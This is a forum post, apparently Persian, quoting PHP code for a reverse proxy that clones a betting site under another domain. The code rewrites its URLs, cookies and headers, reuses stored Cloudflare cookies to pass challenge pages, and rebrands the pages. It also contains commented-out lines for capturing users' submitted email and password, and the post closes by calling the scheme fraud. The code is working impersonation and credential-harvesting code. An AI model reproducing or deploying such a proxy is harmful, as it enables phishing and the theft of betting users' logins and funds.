کد PHP:
<?php
$new_title = "Bet Irish :: Professional Betting System";
$source = "bet.irish";
$target = "ab90tt.com";
if ( stripos(@$_SERVER['REQUEST_URI'], "cdn-cgi") !== false ) {
$target = 'captcha.website';
}
$url_changes = [
"users/register" => "V1L3VzZXIvc2lnbnVw",
"users/login" => "V1L3VzZXIvbG9naW4%3D",
"users/doauth" => "V1L3VzZXIvYXV0aC9sb2dpbg%3D%3D",
"users/doreg" => "V1L3VzZXIvYXV0aC9zaWdudXA%3D",
"users/useraccount" => "V1L3VzZXIvYWNjb3VudA%3D%3D",
"users/userprofile" => "V1L3VzZXIvcHJvZmlsZQ%3D%3D",
"users/saveprofile" => "V1L3VzZXIvYWNjb3VudC91cGRhdGU%3D",
"users/logout" => "V1L3VzZXIvbG9nb3V0",
"balance/topup" => "V1L3VzZXIvdG9wdXA%3D",
"balance/gateway" => "V1L3VzZXIvdG9wdXBGb3Jt",
"static/help" => "V1L2NvbnRlbnQvaGVscA%3D%3D",
"page/support" => "V1L3N1cHBvcnQvaW5kZXg%3D",
"sports_bet" => "V1L3Nwb3J0L3ByZW1hdGNo",
"live_bet" => "V1L3Nwb3J0L2xpdmU%3D",
"scored" => "V1L3Nwb3J0L3Njb3Jlcw%3D%3D",
"user/auth/captcha" => "V1L3VzZXIvYXV0aC9jYXB0Y2hh",
"sport/data/language" => "V1L3Nwb3J0L2RhdGEvbGFuZ3VhZ2U%3D",
"ping" => "V1L3Bpbmc%3D",
"sezar.style.rtl.css" => "default.style.rtl.css",
];
$req_body = str_replace($source, $target, file_get_contents('php://input'));
foreach ( $url_changes as $from=>$to ) $req_body = str_replace($from, $to, $req_body);
$req_headers = "";
$forward_headers = explode(":", strtolower("user-agent:accept-language:content-type:content-length:referer:accept:origin:location")); // cookie:x-requested-with
foreach ( getallheaders() as $n=>$v ) if (in_array(strtolower($n), $forward_headers)) { $v = (strtolower($n) == 'content-length' ? strlen($req_body) : $v); $req_headers .= str_replace($source, $target, "$n: $v\r\n"); }
foreach ( $url_changes as $from=>$to ) $req_headers = str_replace($from, $to, $req_headers);
// if ( in_array(strtoupper($_SERVER['REQUEST_METHOD']), ["POST", "PUT"]) ) // ...
$cf__data = json_decode( @file_get_contents(implode('/', [__DIR__, 'cf-data.json'])), true );
if ( !empty($cf__data['cookies']) ) $_COOKIE = array_merge($_COOKIE, $cf__data['cookies']);
if ( !empty($_COOKIE) ) { $cookies = ''; foreach($_COOKIE as $n=>$v) $cookies .= "$n=$v; "; $req_headers .= "Cookie: " . str_replace($source, $target, trim($cookies)) . "\r\n"; }
$opts = array('http' => $raw =
array(
'method' => $_SERVER['REQUEST_METHOD'],
'content' => $req_body,
'header' => $req_headers,
'follow_location' => false,
'ignore_errors' => true
)
);
$_SERVER['PATH_INFO'] = str_replace( $source, $target, @$_SERVER['PATH_INFO']);
foreach ( $url_changes as $from=>$to ) $_SERVER['PATH_INFO'] = str_replace($from, $to, $_SERVER['PATH_INFO']);
$query = http_build_query(@$_GET); if ( !empty($query) ) $query = '?' . $query;
$data = file_get_contents("http://".$target."/" . ltrim(@$_SERVER['PATH_INFO'], '/') . $query, false, stream_context_create($opts));
$data = preg_replace("/" . preg_quote($target) . "/i", $source, $data);
foreach ( $url_changes as $from=>$to ) $data = str_replace($to, $from, $data);
// ======================================================================
$cf_triggered = (stripos($data, 'challenge-form') !== false);
$cf_command = strtolower(trim(@$_GET['cf__command']));
if ( $cf_triggered || !empty($cf_command) ) {
$cf_page = implode("/", [__DIR__, 'cf-page.php']);
if ( is_file($cf_page) ) { require_once $cf_page; if ($cf_triggered) exit; }
}
// ======================================================================
$data = str_replace("https://telegram.me/joinchat/Bws4hjwtjt8SJeZoDB7Asg", "http://SezarCo.ir", $data);
$data = str_replace("بونوس های ویژه", "طراحی شده توسط کمپانی سزار", $data);
$data = str_replace("/content/promotions", "http://SezarCo.ir/product/62", $data);
$data = str_ireplace("#ffcb39", "#2ebdff", $data);
$data = str_ireplace("#ffd33b", "#0086C3", $data);
$data = str_ireplace("c-orange", "c-cyan", $data);
$data = str_replace("/image/aHR0cDovL2NsMTRmaWxlcy5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9hc3NldHMvMjAxOTEwLzE1NzIxMjA4MzctNDEzNS04ODcxLmdpZkBlYTcwOTMwYjZlNzJiYTUwODJmYjhjZDdkYWJkNGQ3Yw%3D%3D", "/logo-header.png", $data);
$data = str_replace("/V1L2NvbnRlbnQvcHJvbW90aW9ucw%3D%3D", "http://sezar.pro", $data);
if ( !empty($_POST["mail"]) /* TODO: && success == ok*/ ) {
// dbWrite( "bet_users", ["mail" => @$_POST["mail"], "pass" => @$_POST["pass"]] );
// var_dump(["mail" => @$_POST["mail"], "pass" => @$_POST["pass"]] ); exit();
}
$is_html = strstr(implode('\r\n', $http_response_header), '/html');
foreach ($http_response_header as $node) {
$node = str_replace('domain=.' . $target, 'domain=.' . $source, $node);
$node = preg_replace("/" . preg_quote($target) . "/i", $source, $node);
header ($node, false);
}
// $data = trim($data);
if ( empty($data) ) return;
$extra = "<!-- Powered by SezarCMS:v1.0-beta -->";
$extra .= "<style>
.form-button, a.link { transition: color .3s ease, background-color .3s ease, border-color .3s ease; }
.form-container .form-button { border: 1px solid #0187c4; color: #fff !important; }
.form-container .form-button:hover { background-color: #0d0d0d !important; color: #fff !important; }
.header .signup:hover { background-color: #0086c3 !important; color: #fff !important; }
.footer-links .right { display: none }
::-webkit-scrollbar { width: 10px }
::-webkit-scrollbar-track { background-color: #000; border-radius: 3px}
::-webkit-scrollbar-thumb { background-color: #111; border: 1px solid #333}
::-webkit-scrollbar-thumb:vertical { height: 50px; border-radius: 3px}
::-webkit-scrollbar-thumb:horizontal { width: 50px; border-radius: 3px}
</style>";
$extra = trim($extra);
if ( $is_html ) {
$data = str_replace("<head>", "<head>\n".$extra."", $data);
$data = empty($new_title) ? $data : preg_replace("@(<\s*title[^\<\>]*>\s*)([^\<\>]+)(\s*<\s*\/\s*title[^\<\>]*>)@iU", '$1' . htmlentities($new_title) . '$3', $data );
$data = str_replace($target, $source, $data);
}
$data = str_replace("s.$source", "s.$target", $data); // wss://s.bet.irish/
echo $data;
کلاهبرداری معین غفوریان
نوشته اصلی توسط ioservermanager
